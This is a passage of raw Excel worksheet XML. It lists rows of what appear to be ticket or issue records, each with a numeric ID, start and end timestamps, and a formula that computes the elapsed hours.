        <v>66</v>
      </c>
      <c r="H553" t="str">
        <f>TEXT(F553-E553,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="554" spans="1:8" hidden="1">
      <c r="A554" t="s">
        <v>2004</v>
      </c>
      <c r="B554">
        <v>13306</v>
      </c>
      <c r="C554" t="s">
        <v>2005</v>
      </c>
      <c r="D554" t="s">
        <v>7</v>
      </c>
      <c r="E554" s="1">
        <v>43566.788680555554</v>
      </c>
      <c r="F554" s="1">
        <v>43581.243460648147</v>
      </c>
      <c r="G554" t="s">
        <v>547</v>
      </c>
      <c r="H554" t="str">
        <f>TEXT(F554-E554,"[h]")</f>
        <v>346</v>
      </c>
    </row>
    <row r="555" spans="1:8" hidden="1">
      <c r="A555" t="s">
        <v>2006</v>
      </c>
      <c r="B555">
        <v>13305</v>
      </c>
      <c r="C555" t="s">
        <v>2007</v>
      </c>
      <c r="D555" t="s">
        <v>7</v>
      </c>
      <c r="E555" s="1">
        <v>43566.76662037037</v>
      </c>
      <c r="F555" s="1">
        <v>43598.893923611111</v>
      </c>
      <c r="G555" t="s">
        <v>373</v>
      </c>
      <c r="H555" t="str">
        <f>TEXT(F555-E555,"[h]")</f>
        <v>771</v>
      </c>
    </row>
    <row r="556" spans="1:8">
      <c r="A556" t="s">
        <v>1954</v>
      </c>
      <c r="B556">
        <v>13301</v>
      </c>
      <c r="C556" t="s">
        <v>1955</v>
      </c>
      <c r="D556" t="s">
        <v>7</v>
      </c>
      <c r="E556" s="1">
        <v>43566.367037037038</v>
      </c>
      <c r="F556" s="1">
        <v>43567.03701388889</v>
      </c>
      <c r="G556" t="s">
        <v>31</v>
      </c>
      <c r="H556" t="str">
        <f>TEXT(F556-E556,"[h]")</f>
        <v>16</v>
      </c>
    </row>
    <row r="557" spans="1:8">
      <c r="A557" t="s">
        <v>2008</v>
      </c>
      <c r="B557">
        <v>13300</v>
      </c>
      <c r="C557" t="s">
        <v>2009</v>
      </c>
      <c r="D557" t="s">
        <v>7</v>
      </c>
      <c r="E557" s="1">
        <v>43566.095960648148</v>
      </c>
      <c r="F557" s="1">
        <v>43713.000231481485</v>
      </c>
      <c r="G557" t="s">
        <v>2010</v>
      </c>
      <c r="H557" t="str">
        <f>TEXT(F557-E557,"[h]")</f>
        <v>3525</v>
      </c>
    </row>
    <row r="558" spans="1:8" hidden="1">
      <c r="A558" t="s">
        <v>2011</v>
      </c>
      <c r="B558">
        <v>13298</v>
      </c>
      <c r="C558" t="s">
        <v>2012</v>
      </c>
      <c r="D558" t="s">
        <v>7</v>
      </c>
      <c r="E558" s="1">
        <v>43565.630185185182</v>
      </c>
      <c r="F558" s="1">
        <v>43588.233483796299</v>
      </c>
      <c r="G558" t="s">
        <v>258</v>
      </c>
      <c r="H558" t="str">
        <f>TEXT(F558-E558,"[h]")</f>
        <v>542</v>
      </c>
    </row>
    <row r="559" spans="1:8">
      <c r="A559" t="s">
        <v>2013</v>
      </c>
      <c r="B559">
        <v>13297</v>
      </c>
      <c r="C559" t="s">
        <v>2014</v>
      </c>
      <c r="D559" t="s">
        <v>7</v>
      </c>
      <c r="E559" s="1">
        <v>43565.565763888888</v>
      </c>
      <c r="F559" s="1">
        <v>43567.03701388889</v>
      </c>
      <c r="G559" t="s">
        <v>31</v>
      </c>
      <c r="H559" t="str">
        <f>TEXT(F559-E559,"[h]")</f>
        <v>35</v>
      </c>
    </row>
    <row r="560" spans="1:8" hidden="1">
      <c r="A560" t="s">
        <v>2015</v>
      </c>
      <c r="B560">
        <v>13296</v>
      </c>
      <c r="C560" t="s">
        <v>2016</v>
      </c>
      <c r="D560" t="s">
        <v>7</v>
      </c>
      <c r="E560" s="1">
        <v>43565.407708333332</v>
      </c>
      <c r="F560" s="1">
        <v>43626.683796296296</v>
      </c>
      <c r="G560" t="s">
        <v>290</v>
      </c>
      <c r="H560" t="str">
        <f>TEXT(F560-E560,"[h]")</f>
        <v>1470</v>
      </c>
    </row>
    <row r="561" spans="1:8" hidden="1">
      <c r="A561" t="s">
        <v>2017</v>
      </c>
      <c r="B561">
        <v>13293</v>
      </c>
      <c r="C561" t="s">
        <v>2018</v>
      </c>
      <c r="D561" t="s">
        <v>7</v>
      </c>
      <c r="E561" s="1">
        <v>43564.65116898148</v>
      </c>
      <c r="F561" s="1">
        <v>43573.266967592594</v>
      </c>
      <c r="G561" t="s">
        <v>1584</v>
      </c>
      <c r="H561" t="str">
        <f>TEXT(F561-E561,"[h]")</f>
        <v>206</v>
      </c>
    </row>
    <row r="562" spans="1:8" hidden="1">
      <c r="A562" t="s">
        <v>2019</v>
      </c>
      <c r="B562">
        <v>13292</v>
      </c>
      <c r="C562" t="s">
        <v>2020</v>
      </c>
      <c r="D562" t="s">
        <v>7</v>
      </c>
      <c r="E562" s="1">
        <v>43564.636840277781</v>
      </c>
      <c r="F562" s="1">
        <v>43564.66479166667</v>
      </c>
      <c r="G562" t="s">
        <v>1520</v>
      </c>
      <c r="H562" t="str">
        <f>TEXT(F562-E562,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="563" spans="1:8" hidden="1">
      <c r="A563" t="s">
        <v>2021</v>
      </c>
      <c r="B563">
        <v>13291</v>
      </c>
      <c r="C563" t="s">
        <v>2022</v>
      </c>
      <c r="D563" t="s">
        <v>7</v>
      </c>
      <c r="E563" s="1">
        <v>43564.406469907408</v>
      </c>
      <c r="F563" s="1">
        <v>43565.839560185188</v>
      </c>
      <c r="G563" t="s">
        <v>28</v>
      </c>
      <c r="H563" t="str">
        <f>TEXT(F563-E563,"[h]")</f>
        <v>34</v>
      </c>
    </row>
    <row r="564" spans="1:8" hidden="1">
      <c r="A564" t="s">
        <v>2023</v>
      </c>
      <c r="B564">
        <v>13289</v>
      </c>
      <c r="C564" t="s">
        <v>2024</v>
      </c>
      <c r="D564" t="s">
        <v>7</v>
      </c>
      <c r="E564" s="1">
        <v>43564.2969212963</v>
      </c>
      <c r="F564" s="1">
        <v>43566.796863425923</v>
      </c>
      <c r="G564" t="s">
        <v>66</v>
      </c>
      <c r="H564" t="str">
        <f>TEXT(F564-E564,"[h]")</f>
        <v>59</v>
      </c>
    </row>
    <row r="565" spans="1:8" hidden="1">
      <c r="A565" t="s">
        <v>2025</v>
      </c>
      <c r="B565">
        <v>13287</v>
      </c>
      <c r="C565" t="s">
        <v>2026</v>
      </c>
      <c r="D565" t="s">
        <v>7</v>
      </c>
      <c r="E565" s="1">
        <v>43563.855046296296</v>
      </c>
      <c r="F565" s="1">
        <v>43563.917986111112</v>
      </c>
      <c r="G565" t="s">
        <v>2027</v>
      </c>
      <c r="H565" t="str">
        <f>TEXT(F565-E565,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="566" spans="1:8">
      <c r="A566" t="s">
        <v>2028</v>
      </c>
      <c r="B566">
        <v>13286</v>
      </c>
      <c r="C566" t="s">
        <v>2029</v>
      </c>
      <c r="D566" t="s">
        <v>7</v>
      </c>
      <c r="E566" s="1">
        <v>43563.739282407405</v>
      </c>
      <c r="F566" s="1">
        <v>43568.880509259259</v>
      </c>
      <c r="G566" t="s">
        <v>1669</v>
      </c>
      <c r="H566" t="str">
        <f>TEXT(F566-E566,"[h]")</f>
        <v>123</v>
      </c>
    </row>
    <row r="567" spans="1:8">
      <c r="A567" t="s">
        <v>2030</v>
      </c>
      <c r="B567">
        <v>13278</v>
      </c>
      <c r="C567" t="s">
        <v>2031</v>
      </c>
      <c r="D567" t="s">
        <v>7</v>
      </c>
      <c r="E567" s="1">
        <v>43561.879108796296</v>
      </c>
      <c r="F567" s="1">
        <v>43562.93818287037</v>
      </c>
      <c r="G567" t="s">
        <v>98</v>
      </c>
      <c r="H567" t="str">
        <f>TEXT(F567-E567,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="568" spans="1:8" hidden="1">
      <c r="A568" t="s">
        <v>2032</v>
      </c>
      <c r="B568">
        <v>13277</v>
      </c>
      <c r="C568" t="s">
        <v>2033</v>
      </c>
      <c r="D568" t="s">
        <v>7</v>
      </c>
      <c r="E568" s="1">
        <v>43561.79614583333</v>
      </c>
      <c r="F568" s="1">
        <v>43604.664664351854</v>
      </c>
      <c r="G568" t="s">
        <v>204</v>
      </c>
      <c r="H568" t="str">
        <f>TEXT(F568-E568,"[h]")</f>
        <v>1028</v>
      </c>
    </row>
    <row r="569" spans="1:8" hidden="1">
      <c r="A569" t="s">
        <v>2034</v>
      </c>
      <c r="B569">
        <v>13276</v>
      </c>
      <c r="C569" t="s">
        <v>2035</v>
      </c>
      <c r="D569" t="s">
        <v>7</v>
      </c>
      <c r="E569" s="1">
        <v>43561.777604166666</v>
      </c>
      <c r="F569" s="1">
        <v>43561.840092592596</v>
      </c>
      <c r="G569" t="s">
        <v>2036</v>
      </c>
      <c r="H569" t="str">
        <f>TEXT(F569-E569,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="570" spans="1:8">
      <c r="A570" t="s">
        <v>2037</v>
      </c>
      <c r="B570">
        <v>13275</v>
      </c>
      <c r="C570" t="s">
        <v>2038</v>
      </c>
      <c r="D570" t="s">
        <v>7</v>
      </c>
      <c r="E570" s="1">
        <v>43561.774293981478</v>
      </c>
      <c r="F570" s="1">
        <v>43561.81386574074</v>
      </c>
      <c r="G570" t="s">
        <v>814</v>
      </c>
      <c r="H570" t="str">
        <f>TEXT(F570-E570,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="571" spans="1:8">
      <c r="A571" t="s">
        <v>2039</v>
      </c>
      <c r="B571">
        <v>13274</v>
      </c>
      <c r="C571" t="s">
        <v>2040</v>
      </c>
      <c r="D571" t="s">
        <v>7</v>
      </c>
      <c r="E571" s="1">
        <v>43561.767175925925</v>
      </c>
      <c r="F571" s="1">
        <v>43561.788599537038</v>
      </c>
      <c r="G571" t="s">
        <v>2041</v>
      </c>
      <c r="H571" t="str">
        <f>TEXT(F571-E571,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="572" spans="1:8">
      <c r="A572" t="s">
        <v>2042</v>
      </c>
      <c r="B572">
        <v>13273</v>
      </c>
      <c r="C572" t="s">
        <v>2043</v>
      </c>
      <c r="D572" t="s">
        <v>7</v>
      </c>
      <c r="E572" s="1">
        <v>43561.736481481479</v>
      </c>
      <c r="F572" s="1">
        <v>43561.873252314814</v>
      </c>
      <c r="G572" t="s">
        <v>16</v>
      </c>
      <c r="H572" t="str">
        <f>TEXT(F572-E572,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="573" spans="1:8" hidden="1">
      <c r="A573" t="s">
        <v>2044</v>
      </c>
      <c r="B573">
        <v>13270</v>
      </c>
      <c r="C573" t="s">
        <v>2045</v>
      </c>
      <c r="D573" t="s">
        <v>7</v>
      </c>
      <c r="E573" s="1">
        <v>43560.89671296296</v>
      </c>
      <c r="F573" s="1">
        <v>43563.557210648149</v>
      </c>
      <c r="G573" t="s">
        <v>55</v>
      </c>
      <c r="H573" t="str">
        <f>TEXT(F573-E573,"[h]")</f>
        <v>63</v>
      </c>
    </row>
    <row r="574" spans="1:8">
      <c r="A574" t="s">
        <v>2046</v>
      </c>
      <c r="B574">
        <v>13269</v>
      </c>
      <c r="C574" t="s">
        <v>2047</v>
      </c>
      <c r="D574" t="s">
        <v>7</v>
      </c>
      <c r="E574" s="1">
        <v>43560.793425925927</v>
      </c>
      <c r="F574" s="1">
        <v>43560.877349537041</v>
      </c>
      <c r="G574" t="s">
        <v>2048</v>
      </c>
      <c r="H574" t="str">
        <f>TEXT(F574-E574,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="575" spans="1:8" hidden="1">
      <c r="A575" t="s">
        <v>2049</v>
      </c>
      <c r="B575">
        <v>13268</v>
      </c>
      <c r="C575" t="s">
        <v>2050</v>
      </c>
      <c r="D575" t="s">
        <v>7</v>
      </c>
      <c r="E575" s="1">
        <v>43560.752337962964</v>
      </c>
      <c r="F575" s="1">
        <v>43581.947245370371</v>
      </c>
      <c r="G575" t="s">
        <v>2051</v>
      </c>
      <c r="H575" t="str">
        <f>TEXT(F575-E575,"[h]")</f>
        <v>508</v>
      </c>
    </row>
    <row r="576" spans="1:8" hidden="1">
      <c r="A576" t="s">
        <v>2052</v>
      </c>
      <c r="B576">
        <v>13265</v>
      </c>
      <c r="C576" t="s">
        <v>2053</v>
      </c>
      <c r="D576" t="s">
        <v>7</v>
      </c>
      <c r="E576" s="1">
        <v>43560.287997685184</v>
      </c>
      <c r="F576" s="1">
        <v>43611.416597222225</v>
      </c>
      <c r="G576" t="s">
        <v>2054</v>
      </c>
      <c r="H576" t="str">
        <f>TEXT(F576-E576,"[h]")</f>
        <v>1227</v>
      </c>
    </row>
    <row r="577" spans="1:8" hidden="1">
      <c r="A577" t="s">
        <v>2055</v>
      </c>
      <c r="B577">
        <v>13264</v>
      </c>
      <c r="C577" t="s">
        <v>2056</v>
      </c>
      <c r="D577" t="s">
        <v>7</v>
      </c>
      <c r="E577" s="1">
        <v>43560.006388888891</v>
      </c>
      <c r="F577" s="1">
        <v>43563.556701388887</v>
      </c>
      <c r="G577" t="s">
        <v>55</v>
      </c>
      <c r="H577" t="str">
        <f>TEXT(F577-E577,"[h]")</f>
        <v>85</v>
      </c>
    </row>
    <row r="578" spans="1:8" hidden="1">
      <c r="A578" t="s">
        <v>2057</v>
      </c>
      <c r="B578">
        <v>13262</v>
      </c>
      <c r="C578" t="s">
        <v>2058</v>
      </c>
      <c r="D578" t="s">
        <v>7</v>
      </c>
      <c r="E578" s="1">
        <v>43559.713460648149</v>
      </c>
      <c r="F578" s="1">
        <v>43561.786273148151</v>
      </c>
      <c r="G578" t="s">
        <v>51</v>
      </c>
      <c r="H578" t="str">
        <f>TEXT(F578-E578,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="579" spans="1:8" hidden="1">
      <c r="A579" t="s">
        <v>2059</v>
      </c>
      <c r="B579">
        <v>13259</v>
      </c>
      <c r="C579" t="s">
        <v>2060</v>
      </c>
      <c r="D579" t="s">
        <v>7</v>
      </c>
      <c r="E579" s="1">
        <v>43559.482546296298</v>
      </c>
      <c r="F579" s="1">
        <v>43563.537037037036</v>
      </c>
      <c r="G579" t="s">
        <v>204</v>
      </c>
      <c r="H579" t="str">
        <f>TEXT(F579-E579,"[h]")</f>
        <v>97</v>
      </c>
    </row>
    <row r="580" spans="1:8">
      <c r="A580" t="s">
        <v>2061</v>
      </c>
      <c r="B580">
        <v>13258</v>
      </c>
      <c r="C580" t="s">
        <v>2062</v>
      </c>
      <c r="D580" t="s">
        <v>7</v>
      </c>
      <c r="E580" s="1">
        <v>43559.387754629628</v>
      </c>
      <c r="F580" s="1">
        <v>43617.888067129628</v>
      </c>
      <c r="G580" t="s">
        <v>16</v>
      </c>
      <c r="H580" t="str">
        <f>TEXT(F580-E580,"[h]")</f>
        <v>1404</v>
      </c>
    </row>
    <row r="581" spans="1:8" hidden="1">
      <c r="A581" t="s">
        <v>2063</v>
      </c>
      <c r="B581">
        <v>13257</v>
      </c>
      <c r="C581" t="s">
        <v>2064</v>
      </c>
      <c r="D581" t="s">
        <v>7</v>
      </c>
      <c r="E581" s="1">
        <v>43558.661643518521</v>
      </c>
      <c r="F581" s="1">
        <v>43743.81658564815</v>
      </c>
      <c r="G581" t="s">
        <v>365</v>
      </c>
      <c r="H581" t="str">
        <f>TEXT(F581-E581,"[h]")</f>
        <v>4443</v>
      </c>
    </row>
    <row r="582" spans="1:8" hidden="1">
      <c r="A582" t="s">
        <v>2065</v>
      </c>
      <c r="B582">
        <v>13253</v>
      </c>
      <c r="C582" t="s">
        <v>2066</v>
      </c>
      <c r="D582" t="s">
        <v>7</v>
      </c>
      <c r="E582" s="1">
        <v>43557.957407407404</v>
      </c>
      <c r="F582" s="1">
        <v>43557.979097222225</v>
      </c>
      <c r="G582" t="s">
        <v>55</v>
      </c>
      <c r="H582" t="str">
        <f>TEXT(F582-E582,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="583" spans="1:8" hidden="1">
      <c r="A583" t="s">
        <v>2067</v>
      </c>
      <c r="B583">
        <v>13250</v>
      </c>
      <c r="C583" t="s">
        <v>2068</v>
      </c>
      <c r="D583" t="s">
        <v>7</v>
      </c>
      <c r="E583" s="1">
        <v>43557.679768518516</v>
      </c>
      <c r="F583" s="1">
        <v>43583.619930555556</v>
      </c>
      <c r="G583" t="s">
        <v>43</v>
      </c>
      <c r="H583" t="str">
        <f>TEXT(F583-E583,"[h]")</f>
        <v>622</v>
      </c>
    </row>
    <row r="584" spans="1:8" hidden="1">
      <c r="A584" t="s">
        <v>2069</v>
      </c>
      <c r="B584">
        <v>13249</v>
      </c>
      <c r="C584" t="s">
        <v>2070</v>
      </c>
      <c r="D584" t="s">
        <v>7</v>
      </c>
      <c r="E584" s="1">
        <v>43557.62976851852</v>
      </c>
      <c r="F584" s="1">
        <v>43611.585879629631</v>
      </c>
      <c r="G584" t="s">
        <v>51</v>
      </c>
      <c r="H584" t="str">
        <f>TEXT(F584-E584,"[h]")</f>
        <v>1294</v>
      </c>
    </row>
    <row r="585" spans="1:8" hidden="1">
      <c r="A585" t="s">
        <v>2071</v>
      </c>
      <c r="B585">
        <v>13244</v>
      </c>
      <c r="C585" t="s">
        <v>2072</v>
      </c>
      <c r="D585" t="s">
        <v>7</v>
      </c>
      <c r="E585" s="1">
        <v>43557.383055555554</v>
      </c>
      <c r="F585" s="1">
        <v>43557.487164351849</v>
      </c>
      <c r="G585" t="s">
        <v>204</v>
      </c>
      <c r="H585" t="str">
        <f>TEXT(F585-E585,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="586" spans="1:8" hidden="1">
      <c r="A586" t="s">
        <v>2073</v>
      </c>
      <c r="B586">
        <v>13243</v>
      </c>
      <c r="C586" t="s">
        <v>2074</v>
      </c>
      <c r="D586" t="s">
        <v>7</v>
      </c>
      <c r="E586" s="1">
        <v>43557.365219907406</v>
      </c>
      <c r="F586" s="1">
        <v>43557.652743055558</v>
      </c>
      <c r="G586" t="s">
        <v>28</v>
      </c>
      <c r="H586" t="str">
        <f>TEXT(F586-E586,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="587" spans="1:8" hidden="1">
      <c r="A587" t="s">
        <v>2075</v>
      </c>
      <c r="B587">
        <v>13242</v>
      </c>
      <c r="C587" t="s">
        <v>2076</v>
      </c>
      <c r="D587" t="s">
        <v>7</v>
      </c>
      <c r="E587" s="1">
        <v>43557.35396990741</v>
      </c>
      <c r="F587" s="1">
        <v>43557.488912037035</v>
      </c>
      <c r="G587" t="s">
        <v>66</v>
      </c>
      <c r="H587" t="str">
        <f>TEXT(F587-E587,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="588" spans="1:8" hidden="1">
      <c r="A588" t="s">
        <v>2077</v>
      </c>
      <c r="B588">
        <v>13241</v>
      </c>
      <c r="C588" t="s">
        <v>2078</v>
      </c>
      <c r="D588" t="s">
        <v>7</v>
      </c>
      <c r="E588" s="1">
        <v>43557.217939814815</v>
      </c>
      <c r="F588" s="1">
        <v>43705.249710648146</v>
      </c>
      <c r="G588" t="s">
        <v>822</v>
      </c>
      <c r="H588" t="str">
        <f>TEXT(F588-E588,"[h]")</f>
        <v>3552</v>
      </c>
    </row>
    <row r="589" spans="1:8" hidden="1">
      <c r="A589" t="s">
        <v>1772</v>
      </c>
      <c r="B589">
        <v>13239</v>
      </c>
      <c r="C589" t="s">
        <v>2079</v>
      </c>
      <c r="D589" t="s">
        <v>7</v>
      </c>
      <c r="E589" s="1">
        <v>43557.165983796294</v>
      </c>
      <c r="F589" s="1">
        <v>43601.157118055555</v>
      </c>
      <c r="G589" t="s">
        <v>51</v>
      </c>
      <c r="H589" t="str">
        <f>TEXT(F589-E589,"[h]")</f>
        <v>1055</v>
      </c>
    </row>
    <row r="590" spans="1:8" hidden="1">
      <c r="A590" t="s">
        <v>2080</v>
      </c>
      <c r="B590">
        <v>13235</v>
      </c>
      <c r="C590" t="s">
        <v>2081</v>
      </c>
      <c r="D590" t="s">
        <v>7</v>
      </c>
      <c r="E590" s="1">
        <v>43555.758553240739</v>
      </c>
      <c r="F590" s="1">
        <v>43618.374930555554</v>
      </c>
      <c r="G590" t="s">
        <v>66</v>
      </c>
      <c r="H590" t="str">
        <f>TEXT(F590-E590,"[h]")</f>
        <v>1502</v>
      </c>
    </row>
    <row r="591" spans="1:8" hidden="1">
      <c r="A591" t="s">
        <v>2082</v>
      </c>
      <c r="B591">
        <v>13234</v>
      </c>
      <c r="C591" t="s">
        <v>2083</v>
      </c>
      <c r="D591" t="s">
        <v>7</v>
      </c>
      <c r="E591" s="1">
        <v>43555.626134259262</v>
      </c>
      <c r="F591" s="1">
        <v>43558.671423611115</v>
      </c>
      <c r="G591" t="s">
        <v>66</v>
      </c>
      <c r="H591" t="str">
        <f>TEXT(F591-E591,"[h]")</f>
        <v>73</v>
      </c>
    </row>
    <row r="592" spans="1:8" hidden="1">
      <c r="A592" t="s">
        <v>2084</v>
      </c>
      <c r="B592">
        <v>13231</v>
      </c>
      <c r="C592" t="s">
        <v>2085</v>
      </c>
      <c r="D592" t="s">
        <v>7</v>
      </c>
      <c r="E592" s="1">
        <v>43555.50203703704</v>
      </c>
      <c r="F592" s="1">
        <v>43557.213020833333</v>
      </c>
      <c r="G592" t="s">
        <v>66</v>
      </c>
      <c r="H592" t="str">
        <f>TEXT(F592-E592,"[h]")</f>
        <v>41</v>
      </c>
    </row>
    <row r="593" spans="1:8" hidden="1">
      <c r="A593" t="s">
        <v>2086</v>
      </c>
      <c r="B593">
        <v>13230</v>
      </c>
      <c r="C593" t="s">
        <v>2087</v>
      </c>
      <c r="D593" t="s">
        <v>7</v>
      </c>
      <c r="E593" s="1">
        <v>43555.500474537039</v>
      </c>
      <c r="F593" s="1">
        <v>43557.213020833333</v>
      </c>
      <c r="G593" t="s">
        <v>1520</v>
      </c>
      <c r="H593" t="str">
        <f>TEXT(F593-E593,"[h]")</f>
        <v>41</v>
      </c>
    </row>
    <row r="594" spans="1:8" hidden="1">
      <c r="A594" t="s">
        <v>1772</v>
      </c>
      <c r="B594">
        <v>13228</v>
      </c>
      <c r="C594" t="s">
        <v>2088</v>
      </c>
      <c r="D594" t="s">
        <v>7</v>
      </c>
      <c r="E594" s="1">
        <v>43555.454814814817</v>
      </c>
      <c r="F594" s="1">
        <v>43611.580081018517</v>
      </c>
      <c r="G594" t="s">
        <v>1721</v>
      </c>
      <c r="H594" t="str">
        <f>TEXT(F594-E594,"[h]")</f>
        <v>1347</v>
      </c>
    </row>
    <row r="595" spans="1:8" hidden="1">
      <c r="A595" t="s">
        <v>2089</v>
      </c>
      <c r="B595">
        <v>13225</v>
      </c>
      <c r="C595" t="s">
        <v>2090</v>
      </c>
      <c r="D595" t="s">
        <v>7</v>
      </c>
      <c r="E595" s="1">
        <v>43555.046747685185</v>
      </c>
      <c r="F595" s="1">
        <v>43581.243460648147</v>
      </c>
      <c r="G595" t="s">
        <v>2091</v>
      </c>
      <c r="H595" t="str">
        <f>TEXT(F595-E595,"[h]")</f>
        <v>628</v>
      </c>
    </row>
    <row r="596" spans="1:8" hidden="1">
      <c r="A596" t="s">
        <v>2092</v>
      </c>
      <c r="B596">
        <v>13224</v>
      </c>
      <c r="C596" t="s">
        <v>2093</v>
      </c>
      <c r="D596" t="s">
        <v>7</v>
      </c>
      <c r="E596" s="1">
        <v>43554.881620370368</v>
      </c>
      <c r="F596" s="1">
        <v>43555.296620370369</v>
      </c>
      <c r="G596" t="s">
        <v>255</v>
      </c>
      <c r="H596" t="str">
        <f>TEXT(F596-E596,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="597" spans="1:8" hidden="1">
      <c r="A597" t="s">
        <v>2094</v>
      </c>
      <c r="B597">
        <v>13222</v>
      </c>
      <c r="C597" t="s">
        <v>2095</v>
      </c>
      <c r="D597" t="s">
        <v>7</v>
      </c>
      <c r="E597" s="1">
        <v>43554.742465277777</v>
      </c>
      <c r="F597" s="1">
        <v>43626.732071759259</v>
      </c>
      <c r="G597" t="s">
        <v>157</v>
      </c>
      <c r="H597" t="str">
        <f>TEXT(F597-E597,"[h]")</f>
        <v>1727</v>
      </c>
    </row>
    <row r="598" spans="1:8" hidden="1">
      <c r="A598" t="s">
        <v>2096</v>
      </c>
      <c r="B598">
        <v>13220</v>
      </c>
      <c r="C598" t="s">
        <v>2097</v>
      </c>
      <c r="D598" t="s">
        <v>7</v>
      </c>
      <c r="E598" s="1">
        <v>43554.673206018517</v>
      </c>
      <c r="F598" s="1">
        <v>43582.021249999998</v>
      </c>
      <c r="G598" t="s">
        <v>365</v>
      </c>
      <c r="H598" t="str">
        <f>TEXT(F598-E598,"[h]")</f>
        <v>656</v>
      </c>
    </row>
    <row r="599" spans="1:8" hidden="1">
      <c r="A599" t="s">
        <v>2098</v>
      </c>
      <c r="B599">
        <v>13219</v>
      </c>
      <c r="C599" t="s">
        <v>2099</v>
      </c>
      <c r="D599" t="s">
        <v>7</v>
      </c>
      <c r="E599" s="1">
        <v>43554.662314814814</v>
      </c>
      <c r="F599" s="1">
        <v>43564.913541666669</v>
      </c>
      <c r="G599" t="s">
        <v>2100</v>
      </c>
      <c r="H599" t="str">
        <f>TEXT(F599-E599,"[h]")</f>
        <v>246</v>
      </c>
    </row>
    <row r="600" spans="1:8" hidden="1">
      <c r="A600" t="s">
        <v>2101</v>
      </c>
      <c r="B600">
        <v>13218</v>
      </c>
      <c r="C600" t="s">
        <v>2102</v>
      </c>
      <c r="D600" t="s">
        <v>7</v>
      </c>
      <c r="E600" s="1">
        <v>43554.492546296293</v>
      </c>
      <c r="F600" s="1">
        <v>43574.023993055554</v>
      </c>
      <c r="G600" t="s">
        <v>2103</v>
      </c>
      <c r="H600" t="str">
        <f>TEXT(F600-E600,"[h]")</f>
        <v>468</v>
      </c>
    </row>
    <row r="601" spans="1:8" hidden="1">
      <c r="A601" t="s">
        <v>2104</v>
      </c>
      <c r="B601">
        <v>13217</v>
      </c>
      <c r="C601" t="s">
        <v>2105</v>
      </c>
      <c r="D601" t="s">
        <v>7</v>
      </c>
      <c r="E601" s="1">
        <v>43553.886793981481</v>
      </c>
      <c r="F601" s="1">
        <v>43554.017696759256</v>
      </c>
      <c r="G601" t="s">
        <v>55</v>
      </c>
      <c r="H601" t="str">
        <f>TEXT(F601-E601,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="602" spans="1:8" hidden="1">
      <c r="A602" t="s">
        <v>2106</v>
      </c>
      <c r="B602">
        <v>13215</v>
      </c>
      <c r="C602" t="s">
        <v>2107</v>
      </c>
      <c r="D602" t="s">
        <v>7</v>
      </c>
      <c r="E602" s="1">
        <v>43553.628506944442</v>
      </c>
      <c r="F602" s="1">
        <v>43557.581585648149</v>
      </c>
      <c r="G602" t="s">
        <v>115</v>
      </c>
      <c r="H602" t="str">
        <f>TEXT(F602-E602,"[h]")</f>
        <v>94</v>
      </c>
    </row>
    <row r="603" spans="1:8" hidden="1">
      <c r="A603" t="s">
        <v>2108</v>
      </c>
      <c r="B603">
        <v>13214</v>
      </c>
      <c r="C603" t="s">
        <v>2109</v>
      </c>
      <c r="D603" t="s">
        <v>7</v>
      </c>
      <c r="E603" s="1">
        <v>43553.50990740741</v>
      </c>
      <c r="F603" s="1">
        <v>43655.572962962964</v>
      </c>
      <c r="G603" t="s">
        <v>90</v>
      </c>
      <c r="H603" t="str">
        <f>TEXT(F603-E603,"[h]")</f>
        <v>2449</v>
      </c>
    </row>
    <row r="604" spans="1:8" hidden="1">
      <c r="A604" t="s">
        <v>2112</v>
      </c>
      <c r="B604">
        <v>13210</v>
      </c>
      <c r="C604" t="s">
        <v>2113</v>
      </c>
      <c r="D604" t="s">
        <v>7</v>
      </c>
      <c r="E604" s="1">
        <v>43553.240023148152</v>
      </c>
      <c r="F604" s="1">
        <v>43554.017685185187</v>
      </c>
      <c r="G604" t="s">
        <v>138</v>
      </c>
      <c r="H604" t="str">
        <f>TEXT(F604-E604,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="605" spans="1:8" hidden="1">
      <c r="A605" t="s">
        <v>2114</v>
      </c>
      <c r="B605">
        <v>13209</v>
      </c>
      <c r="C605" t="s">
        <v>2115</v>
      </c>
      <c r="D605" t="s">
        <v>7</v>
      </c>
      <c r="E605" s="1">
        <v>43553.232152777775</v>
      </c>
      <c r="F605" s="1">
        <v>43553.300555555557</v>
      </c>
      <c r="G605" t="s">
        <v>909</v>
      </c>
      <c r="H605" t="str">
        <f>TEXT(F605-E605,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="606" spans="1:8" hidden="1">
      <c r="A606" t="s">
        <v>2116</v>
      </c>
      <c r="B606">
        <v>13206</v>
      </c>
      <c r="C606" t="s">
        <v>2117</v>
      </c>
      <c r="D606" t="s">
        <v>7</v>
      </c>
      <c r="E606" s="1">
        <v>43552.788101851853</v>
      </c>
      <c r="F606" s="1">
        <v>43552.870034722226</v>
      </c>
      <c r="G606" t="s">
        <v>138</v>
      </c>
      <c r="H606" t="str">
        <f>TEXT(F606-E606,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="607" spans="1:8" hidden="1">
      <c r="A607" t="s">
        <v>2118</v>
      </c>
      <c r="B607">
        <v>13205</v>
      </c>
      <c r="C607" t="s">
        <v>2119</v>
      </c>
      <c r="D607" t="s">
        <v>7</v>
      </c>
      <c r="E607" s="1">
        <v>43552.75104166667</v>
      </c>
      <c r="F607" s="1">
        <v>43623.291516203702</v>
      </c>
      <c r="G607" t="s">
        <v>66</v>
      </c>
      <c r="H607" t="str">
        <f>TEXT(F607-E607,"[h]")</f>
        <v>1692</v>
      </c>
    </row>
